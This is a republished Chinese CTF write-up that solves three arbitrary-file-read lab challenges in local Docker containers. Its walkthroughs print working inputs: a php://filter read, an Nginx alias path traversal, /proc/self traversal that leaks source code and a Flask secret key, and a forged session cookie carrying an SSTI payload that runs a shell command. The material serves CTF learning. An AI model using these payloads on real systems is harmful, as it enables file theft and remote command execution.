iis服务器助手广告广告

扫码关注官方微信

扫码下载APP
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >CTFer成长之路之任意文件读取漏洞
  • 879

0
分享到

CTFer成长之路之任意文件读取漏洞

php安全开发语言web安全渗透测试漏洞分析代码审计 2023-09-12 13:09:05 879人浏览 八月长安
摘要

任意文件读取漏洞CTF 任意文件读取漏洞 afr_1 题目描述: 暂无 Docker-compose.yml version: '3.2'services: WEB: image: reGIS

任意文件读取漏洞CTF

任意文件读取漏洞

afr_1

题目描述:

暂无

Docker-compose.yml

version: '3.2'services:  WEB:    image: reGIStry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-1:latest    ports:      - 80:80

启动方式

docker-compose up -d

题目Flag

n1book{afr_1_solved}

Writeup

访问url:Http://192.168.10.22/?p=hello

在这里插入图片描述

本题是考查任意文件读取,利用PHP://协议,访问

http://192.168.10.22/?p=php://filter/convert.base64-encode/resource=flag

在这里插入图片描述

将得到的数据进行base64解码,得到flag:n1book{afr_1_solved}

在这里插入图片描述

afr_2

题目描述:

暂无

docker-compose.yml

version: '3.2'services:  web:    image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-2:latest    ports:      - 80:80

启动方式

docker-compose up -d

题目Flag

n1book{afr_2_solved}

Writeup

访问url:http://192.168.10.22/

在这里插入图片描述

本题是考查任意文件读取,访问 http://IP:PORT/img…/即可访问目录为/的文件(Nginx错误配置)

访问url: http://192.168.10.22/img…/

在这里插入图片描述

即可得到目录文件,访问url:192.168.10.22/img…/flag

即可得到flag:n1book{afr_2_solved}

在这里插入图片描述

afr_3

题目描述:

暂无

docker-compose.yml

version: '3.2'services:  web:    image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-3:latest    ports:      - 5000:5000

启动方式

docker-compose up -d

题目Flag

n1book{afr_3_solved}

Writeup

本题考查对linux系统中/proc/目录下文件作用的了解,同时考查了flask模板注入

访问url:http://192.168.10.22:5000/

在这里插入图片描述

输入ifconfig进行查询

在这里插入图片描述

继续点击article

在这里插入图片描述

请求http://192.168.10.22:5000/article?name=…/…/…/…/…/proc/self/cmdline获取当前执行系统命令,得到python server.py

在这里插入图片描述

请求 http://192.168.10.22:5000/article?name=…/…/…/…/…/proc/self/cwd/server.py获取源码

在这里插入图片描述

审计源码,发现flag在flag.py,flask的appkey在key.py,但是此处任意文件读取漏洞被过滤了关键词flag

源码里存在flask SSTI,前提是可以伪造flask的cookie,这里需要用到appkey https://noraj.GitHub.io/flask-session-cookie-manager/

@app.route("/n1page", methods=["GET", "POST"])def n1page():    if request.method != "POST":        return redirect(url_for("index"))    n1code = request.fORM.get("n1code") or None    if n1code is not None:        n1code = n1code.replace(".", "").replace("_", "").replace("{","").replace("}","")    if "n1code" not in session or session['n1code'] is None:        session['n1code'] = n1code    template = None    if session['n1code'] is not None:     '''     这里存在SSTI     '''        template = '''
N1 Page
 
 Hello : %s, why you don't look at our article?
''' % session['n1code'] session['n1code'] = None return render_template_string(template)

所以请求

http://192.168.10.22:5000/article?name=…/…/…/…/…/proc/self/cwd/key.py

获取appkey

#!/usr/bin/Python key = ‘Drmhze6EPcv0fN_81Bj-nA’

在这里插入图片描述

伪造cookie为SSTI的payload获取flag.

{{''.__class__.__mro__[2].__subclasses__()[40]('flag.py').read()}}

得到cookie的值为

eyJuMWNvZGUiOm51bGx9.YB5YLg.zvCvxG173uppSx0eYLBbzVdYKSk

在这里插入图片描述

安装Flask Session Cookie Decoder/Encoder

git clone https://github.com/noraj/flask-session-cookie-manager.git && cd flask-session-cookie-manager

Decode

python3 flask_session_cookie_manager3.py decode -c ‘eyJuMWNvZGUiOm51bGx9.YB5YLg.zvCvxG173uppSx0eYLBbzVdYKSk’ -s ‘Drmhze6EPcv0fN_81Bj-nA’

得到{‘n1code’: None}

在这里插入图片描述

如图所示方式进行加密

python3 flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"

得到加密后的cookie:

.eJwdikEKGCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqai2Ft2XkyiFACNaAPljNjoOBnRDHpdfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.Ev_wtA.71mFW-T5axswqE7F-u3jPywUWR4

在这里插入图片描述

修改session

在这里插入图片描述

获得flag:n1book{afr_3_solved}

在这里插入图片描述

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

博客:https://rdyx0.github.io/先知社区:https://xz.aliyun.com/u/37846SecIN:https://www.sec-in.com/author/3097CSDN:https://blog.csdn.net/weixin_48899364?type=blog公众号:https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirectFreeBuf:https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85

来源地址:https://blog.csdn.net/weixin_48899364/article/details/129143187

您可能感兴趣的文档:
点击免费下载>>软考高级考试备考技巧/历年真题/备考精华资料

--结束END--

本文标题: CTFer成长之路之任意文件读取漏洞

本文链接: https://www.lsjlt.com/news/404572.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
去做题
猜你喜欢
软考高级职称资格查询
iis服务器助手广告
软考职称历年真题下载
软考职称资料下载
热门wiki
近期文章
推荐阅读
热门问答
热门标签
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。

  • 官方手机版

  • 微信公众号

  • 商务合作